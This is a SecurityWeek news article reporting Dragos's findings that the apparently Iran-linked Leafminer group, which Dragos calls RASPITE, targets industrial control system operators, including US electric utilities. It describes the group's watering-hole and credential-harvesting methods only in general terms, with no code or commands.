Connect with us

Hi, what are you looking for?



Iran-Linked Actor Targets U.S. Electric Utility Firms

Likely operating out of Iran,

Likely operating out of Iran, the Leafminer cyber-espionage group has been targeting entities in the United States, Europe, Middle East, and East Asia, industrial cybersecurity firm Dragos warns.

The group was previously said to have been targeting government and other types of organizations in the Middle East since at least early 2017, but it appears that its target list is much broader.

Dragos, which calls the actor RASPITE, says the entity has been targeting industrial control systems in numerous countries, including access operations in the electric utility sector in the United States.

Initial access to target networks is obtained through strategic website compromise (also known as watering hole attacks), the security firm says. Similar to DYMALLOY and ALLANITE threat actors, the group embeds a link to a resource to prompt an SMB connection to harvests Windows credentials.

Next, the actor deploys scripts to install a malicious service that connect to the RASPITE-controlled infrastructure and provide remotely access the victim machine.

Although it did focus on ICS-operating entities, RASPITE has yet to demonstrated an ICS-specific capability. At the moment, there is no indication that the actor can launch destructive ICS attacks such as the widespread blackouts that hit Ukraine.

In a report on the group last week, Symantec revealed that both custom-built malware and publicly-available tools were leveraged in observed campaigns, including a modified version of Mimikatz. Some of the tools were linked to other groups apparently tied to Iran, Symantec said, noting that the actor appears to be inspired by the Russia-linked Dragonfly group.

Advertisement. Scroll to continue reading.

“Dragos caught RASPITE early in its maturity which is ideal as it allows us to track its behavior and threat progression to help organizations defend against them. RASPITE uses common techniques which is good because defenders with sufficient monitoring can catch them and mitigate any opportunity for them to get better,” Sergio Caltagirone, Director of Threat Intelligence, Dragos, said.

“At this time we are limiting the amount of information in our public reports to avoid the proliferation of ideas or tradecraft to other activity groups,” Caltagirone continued.

Related: Iran-Linked ‘Leafminer’ Espionage Campaign Targets Middle East

Related: ‘Allanite’ Group Targets ICS Networks at Electric Utilities in US, UK

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

SecurityWeek’s Threat Detection and Incident Response Summit brings together security practitioners from around the world to share war stories on breaches, APT attacks and threat intelligence.


Securityweek’s CISO Forum will address issues and challenges that are top of mind for today’s security leaders and what the future looks like as chief defenders of the enterprise.


Expert Insights

Related Content

CISO Strategy

Cybersecurity-related risk is a top concern, so boards need to know they have the proper oversight in place. Even as first-timers, successful CISOs make...


The overall effect of current global geopolitical conditions is that nation states have a greater incentive to target the ICS/OT of critical industries, while...


Wago has patched critical vulnerabilities that can allow hackers to take complete control of its programmable logic controllers (PLCs).


Cybersecurity firm Forescout shows how various ICS vulnerabilities can be chained for an exploit that allows hackers to cause damage to a bridge.


More than 1,300 ICS vulnerabilities were discovered in 2022, including nearly 1,000 that have a high or critical severity rating.


Otorio has released a free tool that organizations can use to detect and address issues related to DCOM authentication.

Cybersecurity Funding

Internet of Things (IoT) and Industrial IoT security provider Shield-IoT this week announced that it has closed a $7.4 million Series A funding round,...


Siemens and Schneider Electric address nearly 100 vulnerabilities across several of their products with their February 2023 Patch Tuesday advisories.